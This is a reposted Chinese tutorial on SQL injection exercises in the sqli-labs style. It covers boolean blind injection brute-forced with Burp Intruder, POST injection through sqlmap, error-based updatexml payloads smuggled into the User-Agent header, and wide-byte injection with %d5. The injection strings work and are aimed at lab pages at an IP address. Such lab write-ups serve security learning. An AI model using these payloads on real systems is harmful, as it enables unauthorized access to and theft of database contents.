SQL注入篇二------利用burp盲注,post注入,http頭注入,利用burpsuit找注入點,寬字節注入


1.布爾盲注burpsuit的使用

先自己構造好注入語句,利用burpsuit抓包,設置變量,查出想要的信息。

比如----查數據庫名的ascii碼得到數據庫構造好語句

http://123.206.227.79/Less-8/?id=1' and ascii(sbustr(database(),1,1))=1 --+

 抓包,發送到intruder,設置變量

第一個變量設置為numbers 1到8,第二個變量也設置為numbers 0到127    開始爆破,

2.post注入

其實並沒有什么變化,還是之前的注入方式,無非之前在URL上插payload,現在得抓包,在post參數里插payload,還是顯注,布爾,時間盲注,爆錯注入,套用之前的payload就可以。

抓到post包 參數后加* 保存為txt有sqlmap檢測

 3.http頭注入

 

1、Accept:告訴 WEB 服務器自己接受什么介質類型,*/* 表示任何類型,type/* 表示該類型下的所有子類型,type/sub-type

2、Referer:瀏覽器向 WEB 服務器表明自己是從哪個 網頁/URL 獲得/點擊 當前請求中的網址/URL。例如:Referer:http://www.sina.com/

3、User-Agent: 瀏覽器表明自己的身份(是哪種瀏覽器)。例如:User-Agent:Mozilla/5.0(Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14

 

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent','$IP', $uname)";
將 useragent 和 ip 插入到數據庫中
構造閉合

'or updatexml(1,user(),1)+'

$insert="INSERT INTO `security`.`uagents`+(`uagent'or updatexml(1,user(),1)+'`, `ip_address`, `username`) VALUES ('$uagent','$IP', $uname)";

c'+updatexml(1,concat(0x7e,database(),0x7e),1)+'
c'+updatexml(1,concat(0x7e,database(),0x7e),1)and'

 

4利用burpsuit查找注入點

先抓包設置好變量

設置payload

開始攻擊

5.寬字節注入

構造id參數的查詢語句,各種試id的值,發現結果只有一句話和空白頁兩種情況。然后添加單引號發現返回空白頁。

由於加單引號會出現空白頁,沒有報錯,嘗試寬字節注入

加  %d5    讓單引號逃逸出來

很好的書burpsuit實戰指南


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM